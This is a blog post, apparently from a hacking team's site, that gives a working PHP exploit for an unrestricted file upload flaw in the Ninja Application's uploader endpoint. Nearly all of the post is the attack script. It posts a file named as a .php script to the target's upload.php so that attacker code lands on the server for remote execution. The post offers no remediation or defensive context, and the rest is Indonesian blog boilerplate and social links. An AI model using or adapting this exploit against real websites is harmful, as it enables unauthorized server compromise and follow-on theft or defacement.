Ninja Application Remote Code Vulnerability


#- Title : Ninja Application Remote Vulnerability
#- Vendor : nexthon
#- Platform : PHP
#- Tested on : Windows 8 , Linux
#- Date : 9/16/15
#- Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
#- Vulnerability :  /ninja-applications/fufu/controllers/uploader/upload.php

proof of concept :

<?php
$url = "http://target/ninja-applications/fufu/controllers/uploader/upload.php"; // put URL Here
$post = array
(
"file" => "@3xploi7.jpg",
"name" => "
3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

Result : Here

3xploi7 Team

0 Response to "Ninja Application Remote Code Vulnerability"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel


Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya

Simak Update Artikel menarik disini, Stay toon !! 3xploi7.com
Jangan sampai Terlewatkan.
 • Join Grup Team : 
— Facebook Grup ( 1.973 Anggota )
 Line Square 


 • Update Konten Unik Lainnya di : 
 Instagram
— Twitter

 • Tonton video kami di : 

 Youtube